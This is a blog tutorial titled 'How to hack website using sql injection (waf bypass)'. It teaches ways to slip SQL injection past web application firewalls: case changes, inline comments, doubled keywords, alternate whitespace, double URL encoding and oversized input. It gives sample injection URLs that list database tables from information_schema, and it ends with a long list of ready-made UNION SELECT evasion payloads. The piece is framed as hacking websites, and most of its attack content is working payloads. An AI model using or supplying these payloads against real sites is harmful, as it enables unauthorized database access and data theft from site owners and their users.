/ / How to hack website using sql injection (waf bypass)

How to hack website using sql injection (waf bypass)

Edit

Note: Before starting this topic, I want to clarify that I won't be covering on basic SQL Injection attacks. This article is meant for WAF /Filter bypassing during Injection.

What is WAF?

WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections and Cross Site Scripting (XSS) attacks.

How does it Work?

When WAF detects any malicious input from end user, It gives 403 Forbidden, 406 Not Acceptable or any Kind of Custom errors



How to bypass this thing?

So, what to do next? we cant do our further injection right?

Well its time to use various techniques to bypass thing. Some of these techniques are mentioned below:

# Case Changing:

Most of the Waf's only filter lowercase or higher-case keywords. We can easily evade that kind of wafs by using alternate case.
if union select is forbidden , we can always try UNION SELECT instead. And if both does not work, We can try our luck with using mixture of both. like UniOn seLeCt

# Using Comments

SQL comments really help us in many cases. They play their important role in killing some Waf's Restrictions. e.g

// , -- , --+ , #, -- -

# Inline Comments

Some WAF’s filter keywords like /union\sselect/ig We can bypass these filters by using inline comments most of the time

http://localhost/waf.php?id=1 /*!union*/ /*!select*/ 1,2,3--





Tip: Read SQLi Errors carefully. Sometimes they left error from which we can have idea that how waf is working on this site.


Anyways, We were talking about Filtered Keywords. So it does not mean that waf is only filtering union select. It may be filtering all SQL keywords like table_name, column_name etc

So might need to apply these inline comments on those keywords as well. Example


http://localhost/waf.php?id=1 /*!union*/ /*!select*/ 1,2,/*!table_name*/,4,5 /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schema*/=database()--

# Double use of Keywords

Sometimes WAF removes whole keyword from the query and execute it and throw errors

In such cases, we can use keywords in this way


http://localhost/waf.php?id=1 UNunionION SELselectECT 1,2,3,4,5,6--

Anyways It totally depends upon the scenario. Im just giving a common Idea. Rest is upon you that how you use it.

# Using Different types of Whitespaces

Sometime Waf may be filtering the whitespace we are using between keywords. We mostly use Spaces But space is not the only whitespace we can use in SQL injection. We have some other options as well

for example + .

%20 is use for space, but we can try using one of these whitespaces . some examples are %09 %0A %0B %0C %0D %A0


inurl:

union%0Bselect%0B1,2,3--

# Encoding

We can always try our luck with URL encode thing to bypass WAF. For example we can use


union select 1,/*!table_name*/,3 from information_schema.tables where table_schema=database()

as

union%20select%201,%2f%2a%21table_name%2a%2f,3%20from%20information_schema.tables%20where%20table_schema%3Ddatabase%28%29

but sometime waf filter also filter % itself. So we have to use double URL encoding in that case


union%2520select%25201,%2f%2a%21table_name%2a%2f%2520,3 from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529

# Unexpected Input

This scenario is very rare that we have to use buffer overflow or give unexpected query /request to trick WAF filters.

for example:


http://localhost/waf.php?id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) union select 1,2,3,4,5--

This thing only worked once for me. But knowledge is Power, may be you face any scenario that can be bypassed by using buffer overflow

# use all above mentioned techniques together

ah.. tried all those things but still its showing NOT ACCEPTABLE or FORBIDDEN. well its time to use all these above mentioned techniques combined.

For example: you can use alternative cases with inline comments or obfuscation.

#Some Common Union Select Solutions:

%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT

I hope you have enjoyed this article. Please give us your feedback. So that we maybe able to make things more clear for you next time .
here is a vedio description of this

Read more: http://www.inject.us/2013/12/bypass-sql-hard-filters-waf-bypassing.html#ixzz3AFAEjmo8



Share on Google Plus
Unknown

About Unknown

Hi , This is Osama Mahmood and i will share all my knowledge and skills on #infosec with you and hope you will enjoy learning new and unique things. follow me on twitter @OsamaMahmood007
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment

Subscribe to: Post Comments ( Atom )